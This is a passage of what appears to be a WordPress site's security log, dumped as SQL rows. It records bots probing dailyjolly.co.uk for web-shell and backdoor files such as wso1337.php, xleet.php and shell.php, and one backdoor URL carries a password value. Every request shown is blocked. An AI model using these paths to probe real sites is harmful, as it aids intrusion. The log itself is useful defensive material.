Safari\\/537.36\"}','CfX2nP93hM4HJu6T1j0KotBO',0,1673890283.6393,190,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','T2LfnFCgckiMox8zdRONaG1X',0,1673890283.9091,175,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TtgCAqLWVGeu2r5yjmpxfcIU',0,1673890284.2120,197,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rUY5CbdQPJTSGzM8ek9jgmFy',0,1673890284.5024,192,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','d4vBimjlw2NoYManTkURpFZt',0,1673890284.7573,174,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DHvO3F9e1iwEt0sjxXSZgGJu',0,1673890284.9928,214,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xiOv8tZ4hD9GJnVSsze5al1o',0,1673890285.2768,505,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/seoplugins\\/mar.php\"}','7nqIPfJH3mzhsuxtGUjVLD4v',0,1673894030.1846,352,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/mar.php\"}','crUebp0C7f81AaSZIJsH2n5d',0,1673894032.1274,505,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/ioptimization\\/IOptimize.php?rchk\"}','kyP37iOeh926QHAsVc5X4ZdI',0,1673894038.4936,717,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/alera\\/alpha.php\"}','iNExgA4FuKRLbwl9UvC1ySGj',0,1673894040.5760,261,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','v5tqpaOo8GnXkCuKFysUYD9P',0,1673894041.2398,545,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','O7cGp8uXdhL21CzTPnN6R3if',0,1673894042.4184,667,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wordpress\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','PT8jN9tyqwk3ZcEBSI0QJOH4',0,1673894043.5179,723,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/blog\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','QYIgoLpKwq6eG8rTZEzjk1xl',0,1673894044.6501,428,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/site\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','XiV20O3xcRBYWMHJtU8s67h1',0,1673894045.4859,291,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','056fCayXPuN9rGDVql3LinOU',0,1673894130.9671,182,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','0Fye9lRzVhWNjn23pcrI1Hxg',0,1673894134.4164,210,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','MlfXFHjdgCADsWqcxnvw13Tu',0,1673894135.6330,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','dEpeFcgYzWCqsiK67nPZwkoJ',0,1673894139.8475,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','y0QPmvtNIgCKWk8FUzZADMHX',0,1673894140.3256,214,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','SL0cJ7eylsOIQgv2zwZPoaKB',0,1673894142.7008,182,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','mEVA0naH5dpT3uI24qGwzlFr',0,1673894143.9245,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','IJNmQngCHbOG5vFzdRkBqxPw',0,1673894144.4066,228,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','WlgMi2dN8GO61zfkZVSeIm35',0,1673894145.5707,200,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','SXwFlxNYjGkoItmhMndZuA1R',0,1673894146.6251,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','D5EWq1tzYOjUiJunwCg0ZLlP',0,1673894156.0777,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','D3BeJudfL2SAkZvq96XYipFP',0,1673894162.5686,212,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ZrvPOBKx4ceLVzRlXHnAbgf9',0,1673894163.6609,205,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/.sts.php','','{\"1\":\"python-requests\\/2.28.1\"}','Qow2xWcAq8JpMhUijBzIklO0',0,1673894526.6297,426,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/.Wp-back.phP','','{\"1\":\"python-requests\\/2.28.1\"}','qGUCRmxHajrJhb2vi50N97Yo',0,1673894597.5485,226,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/fx.php','','{\"1\":\"python-requests\\/2.28.1\"}','3a2fw9ZRoGIqgvDrb4AVOnyk',0,1673894841.4932,223,'','GET',403,0,700,0,1,'',0),('101.34.223.139',1696784267,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ci6B5uxtv7S2wNWQog8yqpGO',0,1673894855.0348,266,'','GET',403,0,700,0,1,'',0),('101.34.223.139',1696784267,'','https://www.dailyjolly.co.uk/wp-includes/versions.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','jaM8Z4A0kYedqiPOyu7fIQcU',0,1673894858.5714,189,'','POST',403,0,700,0,1,'',0),('101.34.223.139',1696784267,'','https://www.dailyjolly.co.uk/wp-admin/assets/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','uGQXYlJevdiRxBmNrnoPcqEC',0,1673894859.6738,162,'','GET',403,0,700,0,1,'',0),('101.34.223.139',1696784267,'','https://www.dailyjolly.co.uk/wp-content/plugins/walfs/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','s3j2rXSUP7ZMonTgzRCwQEBh',0,1673894860.7618,167,'','GET',403,0,700,0,1,'',0),('101.34.223.139',1696784267,'','https://www.dailyjolly.co.uk/wp-includes/fonts/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ZQhwvt0aKAEW6xr9RHSijd5F',0,1673894863.1007,181,'','GET',403,0,700,0,1,'',0),('101.34.223.139',1696784267,'','https://www.dailyjolly.co.uk/wp-includes/js/thickbox/themes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','GnkM9BjNq1cmJFSfZEUh0QWH',0,1673894864.5648,186,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/.ae.php','','{\"1\":\"python-requests\\/2.28.1\"}','SxkEp71Zt6FDHdPLghuNfvUT',0,1673894893.3731,216,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php','','{\"1\":\"python-requests\\/2.28.1\"}','1h3eL5IPvV92GWMaUXKoyRCb',0,1673894931.1542,197,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wso112233.php','','{\"1\":\"python-requests\\/2.28.1\"}','tX2Nk6Ssl9pWL3qvmJ5MDKaR',0,1673895009.8787,176,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/bala.php','','{\"1\":\"python-requests\\/2.28.1\"}','8sYruSyj9LhgPabBAqE2WvHw',0,1673895095.9193,213,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','p4HVNubBT8rtglnyGoEewDXi',0,1673895149.3522,206,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','1SE3O4DunUY9slifFIHM6pTg',0,1673895230.3123,244,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','mdjOgKc2xfpvR1biU5YPHStX',0,1673895308.5579,199,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','z53lpiUTkNwC2Z94KGYXcgad',0,1673895358.8627,271,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','Z5h3YAoqO0l2aQRWF7ye6DVb',0,1673895439.8321,199,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','yLcIMVlAUOjwPC7BKEu6mq5h',0,1673895526.0532,207,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','0UaqXOmNP9ibRpQTjHV6xvu1',0,1673895566.0357,223,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','aDd74hW9C26Pu1GwqJYytxFg',0,1673895642.5404,222,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','RBOdAXNwc4fxEIa0ZFuzGnT8',0,1673895728.0180,209,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','PF1ZaXS4xqfLHt9YmlcTQeVJ',0,1673895815.1572,274,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','iNrzj6tUASHa8VY41QRGebhT',0,1673895958.0334,223,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/p.php','','{\"1\":\"python-requests\\/2.28.1\"}','JcWx4d21Gi3qB09jSAgFKrEP',0,1673896095.7069,210,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/t.php','','{\"1\":\"python-requests\\/2.28.1\"}','9HZPqWjebLwAQdN5GFJ83oaR',0,1673896147.3068,207,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','6KWdBmniQNclxHjYF801pMRL',0,1673896213.1218,235,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"python-requests\\/2.28.1\"}','XNsMWHDJIEQ32pjT15Aainlb',0,1673896265.3780,357,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','m0j4sTHLkrziCecObtpWVDIE',0,1673896376.3294,520,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oFaVDnkJr1pAOyW8BcujPNQb',0,1673896395.8366,201,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gvD3IdSAeVxfmUTPtrQ8owG5',0,1673896413.3811,189,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pD4THFEP6j2kNSr1ntYW85UO',0,1673896431.7226,202,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tk5I4wd8A1GnquB3LCgQjOVv',0,1673896447.5956,205,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wS5Xg3OoufZ6kWAtd4aryz17',0,1673896465.7728,193,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LfY0o2iMBk9K3SleQmp4ny1v',0,1673896484.4279,234,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NVzh4BR5arn2S6xDJTQyYdiL',0,1673896500.2384,213,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5fkah4KH0c3l6O1UWQZyRbtu',0,1673896523.6448,203,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dPOzq7VUDa2Zkn4CLSKTlMmA',0,1673896542.7752,205,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GKkhBYyEmso2MWTQ16VIDtHX',0,1673896558.2317,194,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CgyocTqilK4WHbO0dFuN79pt',0,1673896574.8572,189,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XRgt8x4SldhBDTyosCpnqMkw',0,1673896592.6575,268,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ui7AxJ0qmbDcW5SYzsgQhyj9',0,1673896608.3371,219,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zYehIGQ4Z2knUajTltiLCuN1',0,1673896624.5369,235,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','O3c7Mv9UG0SrN2yq8ChQJlLx',0,1673896641.9475,213,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Qt2cHFB0z3msf1hCeX4vSOPa',0,1673896675.1685,244,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','n7EhkleXmgKwNsUIPyBu58aS',0,1673896696.8257,224,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BHsTqeWYydh0i1kXbUPO5fgI',0,1673896714.5553,203,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JT6VS8BEqO0nd5gtlybXhN4U',0,1673896727.8186,263,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','F28e7vrxkLUYBnWHVm0I5JQp',0,1673896740.9243,230,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OidKJjHgvZGQaryotARqbFnN',0,1673896754.1241,196,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pMeIxTlsuioVWZK1wAc5DCyb',0,1673896767.6467,206,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HtKGJ5SEnvBoDfkhzi98uFOP',0,1673896780.9808,215,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pWbHmkNRVzedMUaiIJFw2Avx',0,1673896795.9163,248,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sW4TjBob1qpUZIg7ex8zMRwk',0,1673896820.8934,211,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','M9RCBTP2iuqsXcpfeQNS3DtF',0,1673896837.4771,217,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OxvagmoyuW7RbHsd30c6zPBk',0,1673896853.6306,188,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/Sendemail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9qtOC5r71BJSVXDYykwNLaTl',0,1673896868.4946,395,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r02wTPohuNMQFDtyHWnJva5U',0,1673896881.0547,239,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 